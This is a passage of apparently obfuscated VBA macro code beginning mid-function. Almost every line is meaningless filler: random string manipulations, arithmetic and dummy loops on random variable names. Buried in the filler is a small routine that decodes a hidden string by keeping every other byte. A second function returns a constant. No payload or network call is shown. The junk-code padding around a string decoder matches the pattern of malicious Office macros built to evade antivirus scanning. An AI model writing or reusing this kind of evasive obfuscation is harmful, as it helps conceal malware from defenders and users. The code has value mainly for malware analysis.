    mNhsI = Space(8)
    EhiXZPAc = Left("#kzNdgG*rN?Vh]mxs?", 3)
    YtrUM = 0
    While JvjVfq < 35
        NFtovv = Right("FXjxfErL*&PjLoKhP", 4)
        iarpkGY = StrReverse("pvaEGNNVKcJwC@u")
        EhiXZPAc = StrReverse("X*RJkW I.v-nLM*nrs%@")
        uTUBY = LTrim("h#zlyVAvOViyQ@o")
        xJmTr = Left("[A?HDh%tcAThVejB-B", 2)
        NFtovv = "mg@D![sUw@szv_ikBT" + "NEXvS*JT] %z(qFV$t#" + "#FDmFJ^UgNLSn(PgDw%"
        DNcADa = "ltcG_c%)h[BwXasXwF" + "s)%m$qzIGpXLc@]DT" + "Yrmgv&SL@RLoOw)"
        iarpkGY = Right("Lb*ZSu%SxB", 5)
        NFtovv = Space(11)
        JvjVfq = JvjVfq + 2
    Wend
    VxnsPg = StrConv(UtZamgv, vbFromUnicode)
    For qVTDIA = 0 To UBound(VxnsPg) - 1
    iarpkGY = "bFjdfb_wRK$FFVPZ%" + "Iu% Lpwo^Sq" + "DzBskT&goYEtIg@"
    mNhsI = Space(11)
    EhiXZPAc = 1966 + 1787 + 1421
        If (qVTDIA Mod 2 = 0) Then
        For DQpFlP = 0 To 204
            DNcADa = 1220 - 556 - 980
            mNhsI = 892 - 441 - 1232
        Next DQpFlP
        DNcADa = RTrim("aUOU?$nS#_PrUWEboZc")
        mNhsI = LTrim("y_G*@p(]vS#ZJj")
        DNcADa = Right("jhjpA.aELGOLk", 2)
        dRJNzAWI = Left("t[[NwMi^pa$", 5)
            svdXq(YtrUM) = VxnsPg(qVTDIA)
            AZExHptj = RTrim("w]S)YpTCEY")
            DNcADa = RTrim("NfkFDEsFG$MQOu]*s-")
            DNcADa = "FycQcSNNFJF_gVeS" + "ec(JE#he*Y" + "xxLDod %]dwk %M"
            mNhsI = RTrim("fF(#gRRsEQ")
            mNhsI = LTrim("-AmqnLGe-thvTc")
            YtrUM = YtrUM + 2 - 1
            iarpkGY = 1423 - 1934 - 266
            NFtovv = StrReverse("]BU^![CWsX.U")
            For hryCOI = 0 To 50
                uTUBY = "JOAOa&#udwYmJUDEHt" + "N*@E^wsFDlMX(NE&k" + "ABgWp]kj!_("
                dRJNzAWI = RTrim("aDvJWnT]kLQ")
                uTUBY = LTrim("*&#FoB%Mjv&)Mm!pr&G")
                DNcADa = "qQkRcJhX?B" + "eLb]GgxXZtvHGo.jfO" + "xSsE?XopWtGgWRlWY^gQ"
                NFtovv = "*@ vdCWo]YMFv]#%Oy" + "wBzexDoY%H!lOeMD[" + "!kYaJ#^uS["
                iarpkGY = LTrim("GbGmyRwrm@AAyQB]uD")
                EhiXZPAc = "w$!poD?[YyubB" + ")Gtq&)lD)ItD. SuO^EN" + "AdctDTp.fct-*"
                dRJNzAWI = LTrim("fpBnzMe^A]-x.dIl")
            Next hryCOI
            iarpkGY = Left("^ EbhMxK*^k", 3)
        End If
        While IXORMx < 241
            uTUBY = Space(7)
            xJmTr = 1573 - 1325 - 1157
            DNcADa = Space(17)
            xJmTr = Left("P[uy!atvXzcb.S$mY", 5)
            dRJNzAWI = Space(14)
            IXORMx = IXORMx + 2
        Wend
        While AWnvmn < 304
            iarpkGY = RTrim("TMiC#lAN@B")
            uTUBY = LTrim("xh&a$GxmnL(")
            DNcADa = 1000 - 1132 - 1651
            NFtovv = 1547 + 179 + 635
            uTUBY = Space(12)
            iarpkGY = LTrim("@THGsaYxEfN#xIlaw")
            AWnvmn = AWnvmn + 3
        Wend
        EhiXZPAc = StrReverse("mhL^(QKMlcn")
        uTUBY = LTrim("vLAAS*G@MxTzI")
    Next qVTDIA
    wbYhCzxL = StrConv(svdXq, vbUnicode)
    For XKtDXQ = 0 To 140
        uTUBY = 401 - 1497 - 190
        AZExHptj = Right("(PK#XO!lwNua&", 3)
        NFtovv = RTrim("uWjubKMcxlqy$ARWXD")
        uTUBY = 1971 - 402 - 1527
        iarpkGY = Space(18)
    Next XKtDXQ
    dRJNzAWI = Left("JC@tNNW)]ltZuQqZn?ES", 2)
    uTUBY = Right("$!m#Qk@FSx@R&&", 2)
    uTUBY = Left("c-Bp-wlxaRCT@Qm", 5)
    EhiXZPAc = LTrim("s.guO^-GE.ty]!x]")
End Function
Private Function KFHDIO(sdDycat As Boolean, tKhAIO As Double, MjPKAR As String, TsmRXP As Double, edxZOT As Double) As String
    For ONcZBW = 0 To 342
        xJmTr = 376 - 102 - 1616
        EhiXZPAc = "x%Rnp^WQlW)&U@" + "obzsxx-IuIH" + "MQ#ed?]_]sQZ!"
        DNcADa = Space(12)
        dRJNzAWI = UCase("NFaD!qhCs&Z*nCtu")
        EhiXZPAc = UCase("UPqz T&xcG[$AJjpQ")
        dRJNzAWI = Right("-PX# #@tpidlPl%]DHb!", 4)
        DNcADa = StrReverse("PNir@xWZxolf#iC&G")
        NFtovv = 297 + 1328 + 1794
        NFtovv = UCase("*z*x[MpnWT")
        iarpkGY = UCase("tjWvQ[CR *")
    Next ONcZBW

    xJmTr = 1819 + 1007 + 144
    mNhsI = UCase("sHvrhYSwMMOY")
    xJmTr = 1518 + 1717 + 759
    uTUBY = LTrim("#](D?fTiSYUwqqm")
    NFtovv = 1008 - 419 - 1514
    AZExHptj = "ZQ (-sSG]^&uu C" + "WMeAmx!Cw]" + "r%N)(H-wkTkf&N"
    iarpkGY = Right("ZU-wh)(&*MXdozm", 2)
    While YyWqCn < 101
        dRJNzAWI = UCase("yb^?vBais^[u%bj%pP")
        uTUBY = UCase("L@KFh^q^)..[LDK")
        DNcADa = 237 - 1777 - 1768
        EhiXZPAc = Space(3)
        xJmTr = Space(5)
        dRJNzAWI = Left("^fa*O.[vcbmKNe", 3)
        xJmTr = "osc-@l*eIM_zg" + "(GrgOEH&zX-UEL#Ta#M" + "p)efdcTWi#K%T#"
        uTUBY = LTrim("*XcyhF@&o._kFFg")
        YyWqCn = YyWqCn + 1
    Wend

    mNhsI = Left("NSq@V*!XU#^_", 4)
    NFtovv = LTrim("!OjS[eoDZ(lpnUkQeVB")
    xJmTr = UCase("Bie?vW%Z$^X#B")
    iarpkGY = Space(19)
    For CLoxmE = 0 To 260
        DNcADa = Right("-Bv(Gh(LwumUQc", 5)
        mNhsI = StrReverse("d_nGZ_NNF[sy")
        mNhsI = "bNy gcrNoDt(" + "Nm.)#LSI)@" + "&ho*ikPeSGoX]GjUDSsx"
        DNcADa = Left("J r&Dn$RQkg&KUe$", 3)
        mNhsI = 1814 + 289 + 1722
    Next CLoxmE

    EhiXZPAc = StrReverse("&yr@JbdkfqvNKYl&i")
    For sKbLmi = 0 To 391
        dRJNzAWI = UCase("rUPLyTzPu!TSrxEAoZ")
        mNhsI = LTrim(" mKgrpE.dc #pTT")
        DNcADa = 1106 - 582 - 200
        iarpkGY = UCase("J)xxmt-AGqziNSR*k)$")
        xJmTr = StrReverse("yWKc Jwq$CYR^z!zQZ")
        EhiXZPAc = Right(".(@YUGE&CVb", 2)
        dRJNzAWI = 1622 - 1520 - 432
    Next sKbLmi

    xJmTr = Space(15)
    xJmTr = RTrim("Pm]@S]Xm-U*B]")
    NFtovv = Space(17)
    uTUBY = 537 - 1290 - 1223
    xJmTr = StrReverse("yHv^aPpDxDk Nft.ANb")
    iarpkGY = 435 - 1692 - 231
    uTUBY = UCase("-iqIHQEW_u. gSjj?U]")
    DNcADa = 292 + 1352 + 1200
    DNcADa = RTrim("N#I(ZhFGTb")
    dRJNzAWI = 1562 + 1904 + 184
    dRJNzAWI = LTrim("xznjkclk!Jy")
    xJmTr = Space(15)
    KFHDIO = "ZWcMmFPGrnUOUcYgdaTvlTNjaZTb"
End Function

